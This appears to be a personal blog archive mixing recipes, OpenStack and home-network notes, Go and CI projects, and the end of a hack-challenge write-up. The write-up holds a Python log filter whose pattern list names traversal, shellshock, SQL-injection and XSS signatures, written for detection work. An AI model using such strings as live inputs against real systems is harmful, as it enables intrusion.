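Roughly the kind of programmatic filtering I had in mind (a sketch; it assumes http.log is one JSON object per line with the usual Zeek fields, and the attack patterns here are just a few obvious examples rather than the full list the objective needed):

#!/usr/bin/python3
# Sketch: collect source IPs from a Zeek http.log (JSON lines) whose requests
# match a few obvious attack patterns (LFI, shellshock, SQLi, XSS).
import json

patterns = ["../../", "() { :; };", "union select", "<script>"]

bad_ips = set()
with open("http.log") as f:
    for line in f:
        entry = json.loads(line)
        haystack = " ".join(
            str(entry.get(field, "")) for field in ("uri", "user_agent", "host")
        ).lower()
        if any(p in haystack for p in patterns):
            bad_ips.add(entry["id.orig_h"])

print("\n".join(sorted(bad_ips)))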

Wow, you made it all this way? Prepare for a bit of a downer! :)

In the end I ran out of time. The end of the year approached and there were some busy times in January 2020! Turned out I had gotten quite far with a Python script, but I had too many good IPs in my list I think. In the end I used a jq solution found in a write-up that is available in the Google cache, initially found by searching for the numbers used in the srand function in the elfscrow challenge.

https://downloads.elfu.org/LetterOfWintryMagic.pdf

Recipe: Tortellini Casserole

  • 2 × 250 g tortellini
  • 1 × cherry tomatoes
  • 1 × crushed tomatoes with herbs
  • 1 × cooking cream 10%
  • 1 × feta cheese
  • salt and pepper

Mix the cream, crushed tomatoes and spices. Pour the mixture into an oven dish that already has the tortellini and tomatoes in it. Feta cheese on top. Into the oven at 200 ℃ for ~18 min.

For a second version: maybe better with ricotta, spinach and without the crushed tomatoes?

Recipe: Kids' Chicken & Salmon with Carrot and Sweet Potato

Take the frozen salmon out of the freezer.

  • 3 sweet potatoes
  • 1 parsnip
  • 3 carrots
  • 1 onion
  • 2 cloves of garlic

Put everything into two pots, each ending up at about 800 g. The amount of water you need is ‘enough to cover the food’. Boil the food.

When it is done, put 400 g of salmon into one pot and 400 g of chicken into the other.

Recipe: Porridge

Serves two

3 dl water and 3 dl milk. Whisk, and when it starts to steam turn the heat down. Add 4 scoops of 3/4 dl (12/4, i.e. 3 dl) of flakes (e.g. oat or four-grain). When it is almost done, take it off the heat and add salt.

Put the porridge into bowls, put butter in the middle and then sugar on top.

Tadaa :)

Logging as a Service

Is there an open source thing out there I could use??

So if I want to use mostly free and open source tools, there’s a bunch of them one needs to glue together:

These days, for primary ingestion I’d like to have BGP ECMP/anycast in front of the rsyslog receivers. These would also run Logstash (or a Beat?). Or maybe one can have a load balancer up front which redirects traffic based on the incoming port (and maybe a syslog tag for some ‘authentication’?) to a set of log-parsing/rsyslog servers.

These would write to a Kafka cluster.

Then we would need more readers to stream events on to Elasticsearch, SIEMs, Hadoop or other longer-term storage engines.
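
As a sketch of what one of those readers could look like (hypothetical topic, broker and index names; it uses kafka-python and the plain Elasticsearch REST endpoint, and a real deployment would batch documents through the _bulk API and handle retries):

#!/usr/bin/python3
# Sketch: a reader that streams log events from a Kafka topic into Elasticsearch.
# Topic, broker and index names are made up for illustration.
import json
import requests
from kafka import KafkaConsumer   # pip install kafka-python

consumer = KafkaConsumer(
    "syslog-events",                                   # hypothetical topic
    bootstrap_servers=["kafka-1.example.org:9092"],
    group_id="es-writer",
    value_deserializer=lambda raw: json.loads(raw.decode("utf-8")),
)

ES_URL = "http://elastic.example.org:9200/syslog/_doc"  # hypothetical index

for message in consumer:
    # One document per event; a real reader would batch these with _bulk.
    resp = requests.post(ES_URL, json=message.value, timeout=10)
    resp.raise_for_status()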

For the as-a-Service bit I’d like to play with Rundeck and have users configure most of the bits themselves. Logstash grokking/parsing needs outsourcing to the users too: fewer rules means more throughput, so it would be good to have different Logstash processes for different logs. One could, like Loggly, direct users to ship logs with a tag to get them into the correct lane.

For reading, just Grafana and Kibana should be a good start.

Recipe: Chicken Caesar

Croutons: oven on. Put the frozen bread in the microwave and warm it up. Cut it up and put it on a baking tray. Mix with oil and garlic. Wait.

Mayonnaise: 1 dl rapeseed oil, one egg (don't break it) and a little mustard. Use a stick blender (sauvasekoitin is the proper word). Put it in a small bowl and add garlic and salt.

Salad: small tomatoes, lettuce, one avocado, 400 g chicken fillet just salted. Fry the chicken last, and when it is ready put the croutons in the oven for a few minutes.

Serve with parmigiano at the table.

Tadaa :)

Recipe: Avocado Pasta

Serves two

Instructions: Chop one yellow onion. Put it in a pot with oil. Blend the Turkish yoghurt and two avocados. Salt generously and add a little black pepper. Put the water on for the spaghetti.

The avocado mix goes onto the onions. Grate half a block of parmigiano and put almost all of it in the pot; the rest goes on the table.

Squeeze half a lemon into the pot. When it is warm it is ready. Finally the spaghetti goes into the pot. Check whether more salt and pepper is needed.

Recipe: Chilli Feta Pasta

Serves two

Ingredients:

  • Feta cheese, one 200 g block
  • 180 g spaghetti
  • 1 chilli / habanero
  • ~350 g tomatoes
  • Olive oil
  • Salt and pepper

Instructions:

Turn the oven on to 250 °C. The feta block goes into an oven dish, tomatoes around it. Chop the chilli and put it on top of the cheese. Plenty of oil over everything. Salt and pepper :) 25 min in the oven.

When the water is at 100 °C, add salt and then the spaghetti.

When the tomatoes have burst, take the dish out of the oven and mix the feta and chilli. Put everything together.

Bon App!

Recipe: Overnight Oats with Blueberries

Ingredients:

  • Quark (soft), 250 g
  • Milk, 100 g
  • Runny honey, 6-10 g
  • Frozen blueberries, 100 g
  • Oat flakes, 40 g
  • 1 container with a lid

Instructions:

Put the blueberries in the container and wait about an hour. After that, put all the other ingredients in the container and mix. Take care that the blueberries don't get more crushed than you want. Close the container and put it in the fridge overnight.

Enjoy in the morning!

Contributing To OpenStack Upstream

Recently I had the pleasure of contributing upstream to the OpenStack project!

A link to my merged patches: https://review.opendev.org/#/q/owner:+guldmyr+status:merged

Before a previous OpenStack summit (these days called OpenInfra Summits), Vancouver 2018, I went a few days early and attended the Upstream Institute https://docs.openstack.org/upstream-training/ .
It was 1.5 days long or so if I remember right. Looking up my notes from that, these were the highlights:

  • Best way to start getting involved is to attend weekly meetings of projects
  • Stickersssss
  • A very similar process to RDO with Gerrit and reviews
  • Underlying tests are all done with Ansible and they have ARA enabled, so one gets a nice web UI to view results afterwards. Logs are saved as part of the Zuul testing too, so one can really dig in and see what is tested and what breaks when it’s being tested.

Even though my patches came one baby and a bit over a year after the Upstream Institute, I could still figure things out quite quickly with the help of the guides and get bugs created and patches submitted. My general plan when first attending it wasn’t to contribute code changes, but rather to start reading code, perhaps find open bugs and so on.

The thing I wanted to change in puppet-keystone was apparently also possible to change in many other puppet-* modules, and less than a day after my puppet-keystone change got merged into master, someone else picked up the torch and made PRs to ~15 other repositories with similar changes :) Pretty cool!

Testing is hard! https://review.opendev.org/#/c/669045/1 is one backport I created for puppet-keystone/rocky, and the Ubuntu testing was not working initially (it started with an APT mirror issue and later it was slow and timed out)… After 20 rechecks and two weeks it still hadn’t successfully passed a test. In the end we got there, though, with the help of a core reviewer who actually updated some mirror and later disabled some tests :)

Now, the change itself was about "oslo_middleware/max_request_body_size", so that we can increase it from the default 114688. The Pouta cloud had issues where our federation user mappings were larger than 114688 bytes and we couldn't update them anymore; turns out they were blocked by oslo_middleware.

(Does anybody know where 114688 bytes comes from? Some internal speculation has been that it is 128 kilobytes minus some headers – 114688 is 112 KiB, i.e. 128 KiB minus 16 KiB.)

Anyway, the mapping we have now is simplified, just a long [ list ] of "local_username": "federation_email", domain: "default". I think the next step might be to try to figure out if maybe we can make the rules using something like the below instead of hardcoding the values into the rules:

"name": "{0}" 

It’s been quite hard to find examples that are exactly like our use case (and playing about with it is not a priority right now, just something in the backlog, but it could be interesting to look at when we start accepting more federations).

All in all, I’m really happy to have gotten to contribute something to the OpenStack ecosystem!

Taking puppet-ghostbuster for a spin

We use puppet at $dayjob to configure OpenStack.

I wanted to know if there’s a lot of unused code in our manifests!

**From left of stage enters: https://github.com/camptocamp/puppet-ghostbuster**

Step one is to install the puppet modules and gems and whatnot, this blog post was good about that: https://codingbee.net/puppet/puppet-identifying-dead-puppet-code-using-puppet-ghostbuster

Next I needed to get the HTTP forwarding to the puppetdb working; this can apparently be done with (I learnt about ssh -J):

ssh -J jumphost.example.org INTERNALIPOFPUPPETMASTER -L 8081:localhost:8080

Then it was a matter of setting some variables, pointing at a hiera.yaml:

PUPPETDB_URL=http://localhost:8081
HIERA_YAML=/tmp/hiera.yaml

Unsure if the hiera.yaml works; I just copied it in from the puppetmaster.

Then running it:

find . -type f -name '*.pp' -exec puppet-lint --only-checks ghostbuster_classes,ghostbuster_defines,ghostbuster_facts,ghostbuster_files,ghostbuster_functions,ghostbuster_hiera_files,ghostbuster_templates,ghostbuster_types {} \+ | grep OURMODULE

Got some output! Are they correct?

./modules/OURMODULE/manifests/profile/apache.pp - WARNING: Class OURMODULE::Profile::Apache seems unused on line 6

But actually we have a role that contains:

class { 'OURMODULE::profile::apache': }

So I’m not sure what is up… But if I don’t run all the ghostbuster checks and instead skip the ghostbuster_classes test, I get a lot fewer warnings for our module.

/modules/OURMODULE/manifests/profile/keystone/user.pp - WARNING: Define OURMODULE::Profile::Keystone::User seems unused on line 2

Looking in that one, we have an "OURMODULE::profile::keystone::user" define which calls keystone_user and keystone_user_role. We do call it, but like this:

OURMODULE::Profile::Keystone::User<| title == 'barbican' |>

Or in this other place:

create_resources(OURMODULE::profile::keystone::user, $users)

Let’s look at the next one, which was also a "create_resources". Meh. Same same. And if I skip the ghostbuster_defines? No errors :) Well, it was worth a shot. Some googling on the topic hints that it might not be possible with the way puppet works.

Home Network Convergence

Finally got around to sorting out an issue, which basically was that the TV + Chromecast near the TV were on another network than the media server, and thus I couldn’t stream videos using my phone.

I’ve been thinking lately, and in previous posts, that maybe I should just get an access point and plug it into a port in the correct VLAN near the TV, as mentioned in https://www.guldmyr.com/blog/vlan-in-the-home-network/ and https://www.guldmyr.com/blog/some-updates-to-the-home-network/

But then the other day I started looking at whether the Raspberry Pi I have as a media player could be turned into an access point (some googling suggests it can be done, but most guides talk about a basic Linux install with hostapd and dnsmasq; maybe OpenWrt would be more fun).

Then I realized that I already have an access point over there, which is what the phones and the Chromecast are connected to, and I don’t want a third wifi network at home!

Finally the solution is to get the media server onto the same network as the chromecast. This I could now after the VLAN changes do quite easily.

Steps:
– take the desktop’s cable and put it in a dumb 1GbE switch I had lying around unused
– run a new cable from my desktop’s system board NIC to the same switch
– at this point, ssh into the media server from the internet (because it has no monitor/keyboard)
– add a USB NIC to the media server and connect it to the switch
– set up a static network config on it without a default gw etc.
– update firewalls

Things learnt:
– the USB NIC got a funny and long interface name when I plugged it in. On the next reboot it got eth0, so the network interface config I wrote initially didn’t really work anymore :)

It feels good to not have to use this old and unmaintained media player on the Raspberry Pi anymore. The Android app I use now even supports EAC3!

Next I’m wondering what to do with that Raspberry Pi! RetroPie maybe?

VLAN in the home network!

Above is a previous post in this series about some improvements to my home network, with two modems from two ISPs.

So! On Alibaba I found two Hasivo 8×1GbE managed fanless switches with VLAN support. Delivery time to Finland was really quick. It didn’t say (OK, I didn’t read everything or ask the seller) whether they included European adapters, but it turns out they did!

To recap: the idea was to use the one long cable and transport two VLANs over it. Other than that, how I would actually implement it was a bit fuzzy.

New layout: numbers in the switch-like boxes are VLAN IDs.

Things I’ve learnt while connecting these:

  • Creating a VLAN subinterface in Windows 10 seems to require Hyper-V.. This means if I have one machine and want it in both VLANs I need two NICs. No bother, I found a USB 3 1GbE adapter in a box at home when cleaning :)
  • I knew about VLAN trunk cables, and the way they are implemented in this web interface is to set both VLANs as tagged on the same port.
    • The web interface of this switch has two pages about VLANs. One is a static setup where you say which port is a member of which VLAN and whether it’s tagged or untagged. Changing the default or removing a port from VLAN 1 was not possible on this first screen. On the second one, however, one can change the PVID, which is the untagged/native VLAN.
  • Also found a few extra short ethernet cables in old ISP modem boxes, very nice to have as this exercise required a few more cables.
  • So on the desktop I now need to choose which network interface to use to get to the Internet. I learnt that if I just remove the default gateway for IPv4 from ISP A and use the NIC to ISP B, then IPv6 from ISP A will still be there and used :)
First VLAN config page: the static/tagged VLAN setup
Second VLAN config page: the native VLAN / PVID configuration on one switch

Some more bits about the switches are in order:

On a related note, the modems have switches built in, and I also had a 6-port fanless unmanaged switch which has been working great for the last 6 years or so, but now that got deprecated – yay, one less UK plug adapter :). I prefer using an extra switch as opposed to the modems’: the modems sometimes reboot, which is annoying as it interrupts anything I’m doing, even if it’s only local without going to the Internet.

They have a very basic-looking CGI web interface, which is only accessible on VLAN 1. The firmware is from 2013 and has version v1.0.3. I asked the seller (who was very responsive to all of my questions) and apparently a newer one is in the works, but unfortunately there’s no way to subscribe to any news about new firmware coming.. I doubt it’ll ever come.

One switch-like quality is that to save the running configuration you make in the web interface, you have to click save.

There is a manual; one just had to ask the seller on Alibaba for it – attaching it here for convenience.

All in all this worked out quite nicely. We’ll see how this keeps up. Some further avenues of interest:

  • On my desktop I now use the USB NIC to get to the internet; I tried once to use the system board NIC but then had some issues.. perhaps that one is a bit faster. Using a USB 3 port vs a USB 2 port gave about half a millisecond lower latency to the place I usually ping, ping.funet.fi
  • Response time on the DSL is a bit higher (17 vs 12 ms) to ping.funet.fi
    • tracert shows 17ms to first hop with the DSL’s ISP
    • tracepath shows 10ms to first hop with the cable modem’s ISP
    • pinging the DSL modem is 1ms vs cable modem 3ms
    • ping6 to ping.funet.fi is 10ms with DSL
  • Maybe it’s time to look into a cheap AP to plug in near ISP modem B but connected to VLAN 10, so wifi clients there can reach the server..
  • The switches have a bunch of other settings that could be fun to play with too.

Was the layout diagram above not clear? Try this:

Some updates to the home network 1/2

Current layout:

  • The corner:
    • Cable MODEM NAT&WiFi ISP A
    • One server
    • One desktop which should be on both networks, default gw on one
    • Phones and tablets wifi
  • TV Area:
    • DSL Modem NAT&WiFi ISP B
    • One raspberry pi connected to the server
    • Phones and tablets wifi
    • One chromecast, would be nice to have connected to the server too
    • One ps3
  • 20m, a microwave, and walls between the two areas (and most importantly between the server and the raspberry pi), so wifi is spotty.

Most important factor: one long-ass 30 m UTP cable connecting the raspberry pi to the same network as the server.

It would be cool to: A) be able to connect the desktop to the modem out by the TV, and B) get the chromecast (wifi only) onto the same network as the server, perhaps with an AP for the ISP A network near the TV area.

Stay tuned for another post in the hopefully near future when I’ve got something working to help with A/B :)

Update: another graphical representation of the networks:

A story about writing my first golang script and how to make a mailman archive summarizer

Time to try out another programming language!

Golang I see quite frequently in my twitters, so I have been thinking for a while – why not give it a shot for the next project!

TLDR; https://github.com/martbhell/mailman-summarizer


It took a while to figure out what would be a nice small project. Usually my projects involve some kind of web scraping that helps me somehow; https://wtangy.se/ is one which tells me if there “Was An NHL Game Yesterday”. Also in this case it turned out I wanted something similar, but this time it was work related. I have been tinkering with this for a week or so on and off. Today, the day after Finnish Independence Day, I thought let’s get this going!

For $dayjob I’m in a team that, among many other things, manages a CEPH rados gateway object storage service. CEPH is quite a big (OK, it’s quite an active) project and their mailing lists are a decent (OK, I don’t know a better) place to stay up to date. For example http://lists.ceph.com/pipermail/ceph-users-ceph.com/ has lots of interesting threads. However, it sometimes gets 1000 messages per month! This is way too many for me, especially since most of them are not that interesting to me as I’m not an admin of any CEPH clusters; our services only use them :)

So the idea of an aggregator or filter was born. The mailing list has a digest option when subscribing, but it doesn’t have a filter.

Enter “mailman-summarizer“! https://github.com/martbhell/mailman-summarizer

As usual when I play around in my spare time I try to document much more than is necessary. But if I ever need to re-read this code in a year or two because something broke, then I want to save myself some time. Most likely I won’t be writing much more Go between now and then, so the things I learnt while writing this piece will probably have been purged from memory!

The end result, https://storage.googleapis.com/ceph-rgw-users/feed.xml, as of right now looks like below in one RSS reader:

In summary the steps to get there were:

  • I used https://github.com/bcongdon/colly-example to do some web scraping of the mailman/pipermail web archive of the ceph-users e-mail list. Golang here was quite different from Python and BeautifulSoup: it uses callbacks. I didn’t look too deeply into those, but things did not happen in the same order they were written. Maybe it can be used to speed things up a bit, but the slowest part of this scraping is the 1s+random delay I have between the HTTP GETs, to be nice to the Internet ;)
  • It loops over the months (thread.html) for some of the years and only saves links and titles which have “GW” in the title.
  • Put this in a map (golang is different here too – kind of like a Python dictionary, but one has to initialize it in advance. Lots of googling involved :)
  • Loop over the map and create RSS, JSON, ATOM or HTML output using the gorilla feeds pkg. Use of the time pkg in Golang was needed to have nice fields in the RSS; this was interesting – not using the UNIX 1970-seconds epoch but some reference date in 2006? Most functions/types/interfaces (I don’t know the names of most things) give a value AND an error on the call, which makes declaring a variable look a bit funny:
for l, _ := range data {
    keys = append(keys, l)
}

That was the golang part. I could have just taken the output, stored it in a file and put it on a web server somewhere.

https://wtangy.se uses Google’s object store, but it has an App Engine Python app in front. So I took a break, watched some NHL from yesterday, and in the breaks I thought about what would be a slim way of publishing this feed. I did not want to run a virtual machine or container constantly; the feed is static and can just be put in an object store somewhere. It would need a place to run the code though, to actually generate the RSS feed!

I’m a big fan of Travis CI, and as part of this project the continuous integration does this on every commit:

  • spawn a virtual machine with Go configured (this is all part of Travis (/any other CI system I’ve played with), it just needs the right words in the .travis.yml file in the repo)
  • decrypt a file that has the credentials of a service account which has access to a bucket or two in a project in google cloud
  • compiles mailman-summarizer
  • run a bash script which eventually publishes the RSS feed on a website. It does this to a staging object storage bucket:
    • go runs “mailman-summarizer -rss” and writes the output to a file called feed.xml
    • uses the credentials to write feed.xml to the bucket and make the object public-readable
    • Then the script does the same to the production bucket

One could improve the CI part here in a few ways:

  • Right now it uses the Travis script provider in the deploy phase. There is a ‘gcs’ provider, but I couldn’t find documentation for how to specify the JSON file with the credentials like with App Engine. I get a feeling that because it’s not easy I should probably use App Engine instead..
  • One could do more validation, perhaps validate the RSS feed before actually uploading it. But I couldn’t find a nice program that would validate the feed. There are websites like https://validator.w3.org/feed/ though, so I used that manually. Maybe RSS feeds aren’t so cool anymore – I use them a lot though.
  • An e2e test would also be cool, for example fetching the feed.xml from staging and making sure it is the same as what was uploaded.

Certified OpenStack administrator – check!

Yay! Took the exam last week after having studied for a few days. Nothing seemed to be impossible from the list of requirements at least :)

I thought that because it’s done online it could be scheduled almost on demand, but one had to wait at least 24h for the exam environment to get provisioned.

The online proctoring part was a first for me. For sure it’ll help if you have a non-cheap webcam (with a longer wire) that can be moved around.

The results arrived after only a day: 96%, so I missed something small somewhere. Maybe about Swift, if I have to guess :)

I always liked these practical exams. One really needs some experience with what is being tested; I don’t think it is possible to just study. Fortunately it’s easy to install a lab environment!

Playing with devstack while studying for OpenStack Certified Administrator

Below I’ll go through some topics I thought about while reading through the requirements for the COA:

  • Users and passwords, because we use LDAP at $dayjob. How to set passwords and stuff?
    • openstack user password set
    • openstack role add --user foo member --project demo
  • Users and quotas. Can one set OpenStack to have per-user quotas?
    • guess not :)
  • How to default quota with CLI?
    • nova quota-class commands. Found in operator’s guide in the docs.
  • Create openrc without horizon
    • TIL that OS_AUTH_URL in devstack is http://IP/identity – no separate port :) I couldn’t really find a nice way to generate the openrc, though. Once it’s working there is an “openstack configuration show” which tells you a fair bit.
  • Cinder backup
    • cool, but this service is not there by default in devstack.
  • Cinder encryption 
    • another volume type, with encryption. Shouldn’t need Barbican if a fixed_key is set, but I don’t know; cinder in my devstack wasn’t really working so I couldn’t attach a volume and try it out. I have some volumes with an encryption_key_id of “000000…”, so maybe? Attaching my LVM volumes isn’t working for some reason; it complains about the initiator.
  • Cinder groups.
    • Details are found in the Cinder admin guide under Rocky, not Pike. With the cinder command one can create volume group types, then volume groups, and then volumes in a volume group. Once you have added volumes to a group you can take a snapshot of the whole group, and also create a new volume group (and volumes) from that list of snapshots.
  • Cinder storage pool
    • backends. In devstack it’s devstack@lvmdriver-1. Apparently one can set volume_backend_name both in cinder.conf and as a volume type property.
  • Object expiration. Supported in the Ceph RADOS gateway? Yes, but only from Luminous.
    • available in default devstack (Swift), done with a magical header: X-Delete-At takes a UNIX epoch timestamp, X-Delete-After takes a number of seconds (see the sketch after this list)
  • Make a Heat template from scratch using the docs. 
    • can be made quite minimal
  • Update a stack
  • Checking status of all the services
  • Forget about ctrl+w.
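
A minimal sketch of the object expiration headers, using plain Python requests against a made-up Swift endpoint and token (the swift CLI can set the same headers):

# Sketch of Swift object expiration. Storage URL, token, container and object
# names are made up for illustration.
import requests

storage_url = "http://192.168.0.10:8080/v1/AUTH_demo"  # hypothetical endpoint
token = "gAAAA..."                                     # hypothetical token

# Upload an object that deletes itself after one hour (3600 seconds).
requests.put(
    storage_url + "/mycontainer/self-destruct.txt",
    headers={"X-Auth-Token": token, "X-Delete-After": "3600"},
    data=b"gone in an hour",
).raise_for_status()

# X-Delete-At works the same way but takes an absolute UNIX epoch timestamp.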

Study Environment

A devstack setup on Ubuntu 18.04 in a VM in the $dayjob cloud. This means no nested virtualization, and I wondered how unhappy Neutron would be because of port security. But it’s all within one VM, and it started OK; not everything worked, but that’s fine with me :) Probably I just need a local.conf that is not the default!

One thing I got to figure out was the LVM setup for cinder. Always fun to read logs :)

Studying for Openstack Certified Administrator

The plan: study a bit and then attempt the COA exam. If I don’t pass, attend the SUSE course during the OpenStack Summit.

And what to study? I’ve been doing OpenStack admin work for the last year or two, so I have already worked with and used most services, except Swift. But there are some things that were only done once, when each environment was set up. Also, at $dayjob our code does a lot for us.

One such thing I noticed while looking through https://github.com/AJNOURI/COA/wiki/02.-Compute:-Nova was setting the default project quota. I wondered if that’s a CLI/web UI/API call or service configuration. A config file would be weird, unless it’s in Keystone. Turns out default quotas live in each service’s config file, and it’s also possible to set a default quota with, for example, the nova quota-class commands.

Another perhaps useful thing I did was to go through the release notes for the services. $dayjob runs Newton, so I started with the release after that and tried to grok the biggest changes. The introduction of placement was one of them, and I got a hands-on introduction to it while playing with devstack and a “failed to create resource provider devstack” error. Looking through the logs I saw a “409 Conflict” HTTP error: placement was complaining that the resource already existed. So somehow during setup it was created, but in the wrong way? I deleted it and restarted nova, it got created automatically, and after that nova started acting a lot better :)

wtangy.se – now with user preferences!

As part of learning some more about modern web development I’ve learnt that cookies are out of fashion and one should use some kind of local storage in the web browser. One such mechanism is Web Storage.

https://wtangy.se/ got some more updates over the weekend :)

Now if you choose a team in the /menu and later (from the same browser) visit https://wtangy.se/ you’ll get the results for that team. The selection can be cleared at the bottom of the menu.

wtangy.se – site rename and automatic deployments!

This is a good one!

Previous entries in this series: http://www.guldmyr.com/blog/wasthereannhlgamelastnight-com-now-using-object-storage/ and  http://www.guldmyr.com/blog/wasthereannhlgamelastnight-appspot-com-fixed-working-again/

Renamed to wtangy.se

First things first! The website has been renamed to wtangy.se! Nobody in their right mind would type out wasthereannhlgamelastnight.com, so now it’s an acronym of wasthereannhlgameyesterday: wtangy.se. Using Sweden’s .se top-level domain because there was an offer making it really cheap :)

 

Automatic testing and deployment

The second important update is that we now do some automatic testing and deployment.

This is done with travis-ci.org, where one can view the builds; the configuration is done in this file.

In Google Cloud there are different versions of the app deployed. If we don’t promote a version it will not be accessible from wtangy.se (or wasthereannhlgamelastnight.appspot.com), only via some other URL.

Right now the testing happens like this on every commit:

  1. deploy the code to a testing version (which we don’t promote)
  2. then we run some scripts:
    1. pylint on the python scripts
    2. an end-to-end test which tries to visit the website (a small sketch of this follows the list)
  3. if the above succeeds we deploy to master (which we do promote)
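
The end-to-end test does not need to be fancy. A sketch of the idea, assuming the requests library; the URL for the non-promoted testing version is made up for illustration:

# e2e sketch: check that the testing version serves something at all.
# The version URL below is made up for illustration.
import requests

def test_site_is_up(url="https://testing-dot-wasthereannhlgamelastnight.appspot.com/WINGS"):
    r = requests.get(url, timeout=10)
    r.raise_for_status()                      # any HTTP error fails the build
    assert r.text.strip(), "empty response"   # the page rendered something

test_site_is_up()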

wasthereannhlgamelastnight.com – now using object storage!

To continue this series of blog posts about the awesome https://wasthereannhlgamelastnight.appspot.com/WINGS web site, where you can see if there was, in fact, an NHL game last night :)

Some background: first I had a python script that scraped the nhl.com website, and later changed that to just grab the data from the JSON REST API of nhl.com – much nicer. But it was still outputting the result to stdout as a set and a dictionary, and then in the application I would import this file to get the schedule. This was quite hacky and ugly :) But hey, it worked.

As of this commit it now uses Google’s Cloud Object Storage:

  • a special URL (one has to be an admin to be able to access it)
  • there’s a cronjob which calls this URL once a day (22:00 in some time zone)
  • when this URL is called, a python script runs which (a rough sketch follows the list):
    • checks what year it is and composes the URL to the API so that we only grab this season’s games (to be a bit nicer to the API)
    • does some sanity checking – that the fetched data is not empty
    • extracts the dates and teams as before and writes two variables:
      • one list which has the dates when there’s a game
      • one dictionary which has the dates and all the games on each date
        • probably the latter alone would be enough ;)
    • finally always overwrites the schedule
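
Roughly, the script does something like the sketch below. The API URL, bucket name and JSON field names are placeholders for illustration; the real thing runs inside App Engine with its own storage library:

# Sketch of the daily schedule update. URL, bucket and field names are
# illustrative, not the real ones.
import datetime
import json
import requests
from google.cloud import storage

def update_schedule():
    year = datetime.date.today().year
    # compose a season-limited URL so we only grab this season's games
    url = "https://example-nhl-api/schedule?start=%d-09-01&end=%d-07-01" % (year, year + 1)
    dates = requests.get(url, timeout=30).json().get("dates", [])
    if not dates:
        raise RuntimeError("fetched schedule is empty, refusing to overwrite")

    game_dates = [d["date"] for d in dates]                  # list: dates with a game
    games_per_date = {d["date"]: d["games"] for d in dates}  # dict: date -> games

    blob = storage.Client().bucket("wtangy-schedule").blob("schedule.json")
    blob.upload_from_string(
        json.dumps({"dates": game_dates, "games": games_per_date}),
        content_type="application/json",
    )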

 

To only update it when there are changes would be cool, as then I could notify myself (and possibly others) when there have been changes. But it would mean that the JSON has to be serialized in a stable order, which dicts aren’t by default, so I’d have to change some stuff. The GCSFileStat has checksum-like metadata for the files called ETAG, but it would probably be best to first compute a checksum of the generated JSON and add that as extra metadata on the object, since the ETAG is probably implemented differently between providers.
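
A sketch of that idea, assuming the google-cloud-storage client; sort_keys makes the JSON deterministic, and the bucket, object and metadata key names are made up:

# Sketch: only overwrite (and notify) when the schedule actually changed.
# Bucket, object and metadata key names are made up for illustration.
import hashlib
import json
from google.cloud import storage

def upload_if_changed(schedule):
    payload = json.dumps(schedule, sort_keys=True)            # deterministic serialization
    digest = hashlib.md5(payload.encode("utf-8")).hexdigest()

    blob = storage.Client().bucket("wtangy-schedule").blob("schedule.json")
    if blob.exists():
        blob.reload()                                         # fetch current metadata
        if (blob.metadata or {}).get("schedule-md5") == digest:
            return False                                      # nothing changed, skip upload
    blob.metadata = {"schedule-md5": digest}
    blob.upload_from_string(payload, content_type="application/json")
    return True                                               # changed: a good place to notify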

 

wasthereannhlgamelastnight.appspot.com – fixed – working again!